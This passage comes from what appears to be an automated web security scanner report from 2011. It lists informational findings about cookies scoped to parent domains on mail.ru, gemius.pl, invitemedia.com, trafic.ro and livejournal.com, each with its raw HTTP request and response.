Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/jpeg
Content-Length: 1736
Connection: keep-alive
Set-Cookie: p=G+0GAEqHxAAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C......................... ....................!........."$".$.......C..............................................
...[SNIP]...

15.83. http://r2.mail.ru/b13058851.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13058851.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=r+cGAJjr5wAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058851.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/jpeg
Content-Length: 1405
Connection: keep-alive
Set-Cookie: p=r+cGAJjr5wAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C......................... ....................!........."$".$.......C..............................................
...[SNIP]...

15.84. http://r2.mail.ru/b13058852.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13058852.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=FPQGAFSf2AAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058852.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/jpeg
Content-Length: 1184
Connection: keep-alive
Set-Cookie: p=FPQGAFSf2AAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C......................... ....................!........."$".$.......C..............................................
...[SNIP]...

15.85. http://r2.mail.ru/b13058968.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13058968.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=29QGAEyt3gAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058968.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 23542
Connection: keep-alive
Set-Cookie: p=29QGAEyt3gAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2011:04:17 23:49:14.........
...[SNIP]...

15.86. http://r2.mail.ru/b13059223.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13059223.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=RtAGAEqpQQAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13059223.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 3609
Connection: keep-alive
Set-Cookie: p=RtAGAEqpQQAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d.....C....................................................................C.......................................................................2.2..".............................
...[SNIP]...

15.87. http://r2.mail.ru/b13059860.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13059860.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=EegGAJjr5wAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13059860.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 1805
Connection: keep-alive
Set-Cookie: p=EegGAJjr5wAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

..........................................................................................................2.2..
...[SNIP]...

15.88. http://r2.mail.ru/b13060405.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13060405.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=We8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:24 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13060405.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:24 GMT
Content-Type: image/jpeg
Content-Length: 1285
Connection: keep-alive
Set-Cookie: p=We8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:24 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:24 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222222222222222......2.2.."..............................
...[SNIP]...

15.89. http://r2.mail.ru/b13060487.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13060487.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=Te8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13060487.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 1840
Connection: keep-alive
Set-Cookie: p=Te8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d.....C.......................

............................... "..".......C.....................................................................2.2.................................
...[SNIP]...

15.90. http://r2.mail.ru/b13061099.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13061099.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=k+0GAEqHxAAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13061099.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:22 GMT
Content-Type: image/jpeg
Content-Length: 3520
Connection: keep-alive
Set-Cookie: p=k+0GAEqHxAAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:22 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......<.........R.u.s.s.i.a.n. .P.r.e.s.i.d.e.n.t. .D.m.i.t.r.y. .M.e.d.v.e.d.e.v. .i.s. .s.e.e.n. .a.g.a.i.n.s.t. .t.h.e. .b.a.c.k.g.r.o.u.n.d. .o.f. .R.u.s.s.i.a.'.s. .
...[SNIP]...

15.91. http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rbcgaru.hit.gemius.pl
Path:	/_1303741244306/rexdot.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

Gtestss=Fsn.sfn.IWGSprvHhyLhdPi7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Gdyn=KlQbwQoGvGQpqwumpBLsoeG2GGGQ8Q7GEMQp-G3AKvMaejey8CDBPMx8REGT7r5vpXJc90jGFyFxGs..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_1303741244306/rexdot.gif?l=11&id=dv1K38epj5OVvUz_k_bVXZdS..OUmvCYJk0brLMVk1z.X7&tz=300&href=http%3A//pretty.ru/&ref=&screen=1920x1200&col=16 HTTP/1.1
Host: rbcgaru.hit.gemius.pl
Proxy-Connection: keep-alive
Referer: http://pretty.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Gtestss=TyHLZcpeZ6QeXgn5D25OXPa7; Gdyn=KlS_MB9GvGQpqwo8SYS8RSpGLl2xMSy8rDOx5Rf1MG88inAs-QFjaGGM8GGaSbY3W5bQsj8GmbsxGs..

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:44:55 GMT
Expires: Sun, 24 Apr 2011 14:44:55 GMT
Accept-Ranges: none
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Set-Cookie: Gtestss=Fsn.sfn.IWGSprvHhyLhdPi7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gdyn=KlQbwQoGvGQpqwumpBLsoeG2GGGQ8Q7GEMQp-G3AKvMaejey8CDBPMx8REGT7r5vpXJc90jGFyFxGs..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
P3P: CP="NOI DSP COR NID PSAo OUR IND"
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!...
...,...........L..;

15.92. http://rbcgaru.hit.gemius.pl/_1303741312919/rexdot.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rbcgaru.hit.gemius.pl
Path:	/_1303741312919/rexdot.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

Gtestss=jWsrZem9.5JcOYXoINPbKvT7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Gdyn=KlxStQsGvGQpqwumpBLsoeG2GGGQ8Q7GEMQp-G3AKBDGXjey8CDBPMGGQaQGiag6Kq1W98ASFsjZxnaUMG..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_1303741312919/rexdot.gif?l=11&id=16LgHadxo4kFfevqG4Osi_UTDmyR8tuASw2dzIE9wLz.x7&tz=300&href=http%3A//pda.loveplanet.ru/&ref=http%3A//my.webalta.ru/&screen=1920x1200&col=16 HTTP/1.1
Host: rbcgaru.hit.gemius.pl
Proxy-Connection: keep-alive
Referer: http://pda.loveplanet.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Gtestss=4YEhxFlgK1uccYJIgsvm8f57; Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Gdyn=KlGUSB9GvGQpqwumpBLsoeG2GGGQ8Q7GEMQp-G3AKvMaejey8CDBPMx8REQ58k5vpXJc90jGFyFxGs..

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:52:49 GMT
Expires: Sun, 24 Apr 2011 14:52:49 GMT
Accept-Ranges: none
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Set-Cookie: Gtestss=jWsrZem9.5JcOYXoINPbKvT7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gdyn=KlxStQsGvGQpqwumpBLsoeG2GGGQ8Q7GEMQp-G3AKBDGXjey8CDBPMGGQaQGiag6Kq1W98ASFsjZxnaUMG..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
P3P: CP="NOI DSP COR NID PSAo OUR IND"
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!...
...,...........L..;

15.93. http://segment-pixel.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

segments_p1="eJzjYuE42M3IxcLR9J8JSDYDSWaOozlAZmcHM5A8dAQkMN0YAMDqCYQ="; Domain=invitemedia.com; expires=Tue, 24-Apr-2012 14:40:42 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment&returnType=js HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXX0="; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]}"; camp_freq_p1="eJzjkuFYMZ9VgFFict/ptywKjBqTmz+8ZTFgtADzuUQ4dt5nBsrOmr8WKMugwWDAYMEAAM06EHg="; io_freq_p1="eJzjEubYFirAKDG57/RbFgNGCzDNJcyx1wUoOGv+2rcsCgwaDAYMFgwAG9QMUw=="; dp_rec="{\"3\": 1303562003+ \"2\": 1303072666}"; segments_p1="eJzjYuE42M3IxcLR9J8JSDaDyc4OZiB56AgTFzPHdGMAkgUIPg=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 25 Apr 2011 14:40:42 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 25-Apr-2011 14:40:22 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: segments_p1="eJzjYuE42M3IxcLR9J8JSDYDSWaOozlAZmcHM5A8dAQkMN0YAMDqCYQ="; Domain=invitemedia.com; expires=Tue, 24-Apr-2012 14:40:42 GMT; Path=/
Content-Length: 343

makePixelRequest("http://ad.yieldmanager.com/pixel?id=772369&t=2","image");

function makePixelRequest(pixelURL,pixelType){

if(pixelType == "javascript")
{
document.write('<script src
...[SNIP]...

15.94. http://storage.trafic.ro/js/trafic.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://storage.trafic.ro
Path:	/js/trafic.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

trafic_ranking=6c7f4ecfdd8l1dc980fda3f00c3621d0; expires=Sun, 11-Jan-2037 14:00:00 GMT; path=/; domain=.trafic.ro

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/trafic.js HTTP/1.1
Host: storage.trafic.ro
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:20:47 GMT
Server: Apache
Content-type: application/x-javascript
Expires: Thu, 11 Jan 1973 16:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:20:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="ALL IND DSP COR ADM CONo CUR IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: trafic_ranking=6c7f4ecfdd8l1dc980fda3f00c3621d0; expires=Sun, 11-Jan-2037 14:00:00 GMT; path=/; domain=.trafic.ro
Connection: close

t_js_dw_time=new Date().getTime();document.write('<scr' + 'ipt type="text/javascript" src="http://storage.trafic.ro/js/trafic.js?tk='+(Math.pow(10,16) * Math.random())+'&t_rid='+t_rid+'"></sc' + 'ript
...[SNIP]...

15.95. http://top5.mail.ru/counter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://top5.mail.ru
Path:	/counter

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

VID=2VWb1Y31X_ms; path=/; expires=Tue, 26 Jul 2011 14:48:03 GMT; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=110605;js=13;r=;j=true;s=1920*1200;d=16;rand=0.07091198652051389 HTTP/1.1
Host: top5.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:48:03 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2VWb1Y31X_ms; path=/; expires=Tue, 26 Jul 2011 14:48:03 GMT; domain=.mail.ru
Set-Cookie: FTID=0; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:01 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 43
Connection: close

GIF89a.............!.......,...........D..;

15.96. http://www.livejournal.com/tools/endpoints/journalspotlight.bml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livejournal.com
Path:	/tools/endpoints/journalspotlight.bml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ljuniq=Xw061catQYuvMxT:1303742123:pgstats0:m0; expires=Friday, 24-Jun-2011 14:35:23 GMT; domain=.livejournal.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tools/endpoints/journalspotlight.bml?skip=1&limit=&show_userpics=1&user=&_rand=0.36380812083370984 HTTP/1.1
Host: www.livejournal.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
